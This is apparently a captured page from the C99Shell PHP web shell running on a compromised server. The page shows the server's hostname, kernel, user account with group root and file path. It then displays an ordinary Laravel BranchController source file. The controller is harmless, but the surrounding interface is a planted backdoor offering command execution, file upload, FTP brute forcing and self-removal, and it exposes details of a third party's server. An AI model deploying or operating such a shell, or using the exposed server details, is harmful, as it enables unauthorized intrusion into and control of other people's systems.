!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/app/Http/Controllers/   drwxr-xr-x
Free 28.6 GB of 117.98 GB (24.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BranchController.php (4.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Http\Controllers;

use 
App\Models\Branch;
use 
App\Models\Department;
use 
Illuminate\Http\Request;

class 
BranchController extends Controller
{
    public function 
index()
    {
        if(
\Auth::user()->can('manage branch'))
        {
            
$branches Branch::where('created_by''='\Auth::user()->creatorId())->get();

            return 
view('branch.index'compact('branches'));
        }
        else
        {
            return 
redirect()->back()->with('error'__('Permission denied.'));
        }
    }

    public function 
create()
    {
        if(
\Auth::user()->can('create branch'))
        {
            return 
view('branch.create');
        }
        else
        {
            return 
response()->json(['error' => __('Permission denied.')], 401);
        }
    }

    public function 
store(Request $request)
    {
        if(
\Auth::user()->can('create branch'))
        {

            
$validator \Validator::make(
                
$request->all(), [
                                   
'name' => 'required',
                               ]
            );
            if(
$validator->fails())
            {
                
$messages $validator->getMessageBag();

                return 
redirect()->back()->with('error'$messages->first());
            }

            
$branch             = new Branch();
            
$branch->name       $request->name;
            
$branch->created_by \Auth::user()->creatorId();
            
$branch->save();

            return 
redirect()->route('branch.index')->with('success'__('Branch  successfully created.'));
        }
        else
        {
            return 
redirect()->back()->with('error'__('Permission denied.'));
        }
    }

    public function 
show(Branch $branch)
    {
        return 
redirect()->route('branch.index');
    }

    public function 
edit(Branch $branch)
    {
        if(
\Auth::user()->can('edit branch'))
        {
            if(
$branch->created_by == \Auth::user()->creatorId())
            {

                return 
view('branch.edit'compact('branch'));
            }
            else
            {
                return 
response()->json(['error' => __('Permission denied.')], 401);
            }
        }
        else
        {
            return 
response()->json(['error' => __('Permission denied.')], 401);
        }
    }

    public function 
update(Request $requestBranch $branch)
    {
        if(
\Auth::user()->can('edit branch'))
        {
            if(
$branch->created_by == \Auth::user()->creatorId())
            {
                
$validator \Validator::make(
                    
$request->all(), [
                                       
'name' => 'required',
                                   ]
                );
                if(
$validator->fails())
                {
                    
$messages $validator->getMessageBag();

                    return 
redirect()->back()->with('error'$messages->first());
                }

                
$branch->name $request->name;
                
$branch->save();

                return 
redirect()->route('branch.index')->with('success'__('Branch successfully updated.'));
            }
            else
            {
                return 
redirect()->back()->with('error'__('Permission denied.'));
            }
        }
        else
        {
            return 
redirect()->back()->with('error'__('Permission denied.'));
        }
    }

    public function 
destroy(Branch $branch)
    {
        if(
\Auth::user()->can('delete branch'))
        {
            if(
$branch->created_by == \Auth::user()->creatorId())
            {
                
$branch->delete();

                return 
redirect()->route('branch.index')->with('success'__('Branch successfully deleted.'));
            }
            else
            {
                return 
redirect()->back()->with('error'__('Permission denied.'));
            }
        }
        else
        {
            return 
redirect()->back()->with('error'__('Permission denied.'));
        }
    }

    public function 
getdepartment(Request $request)
    {

        if(
$request->branch_id == 0)
        {
            
$departments Department::get()->pluck('name''id')->toArray();
        }
        else
        {
            
$departments Department::where('branch_id'$request->branch_id)->get()->pluck('name''id')->toArray();
        }

        return 
response()->json($departments);
    }

    public function 
getemployee(Request $request)
    {
        if(
in_array('0'$request->department_id))
        {
            
$employees Employee::get()->pluck('name''id')->toArray();
        }
        else
        {
            
$employees Employee::whereIn('department_id'$request->department_id)->get()->pluck('name''id')->toArray();
        }

        return 
response()->json($employees);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--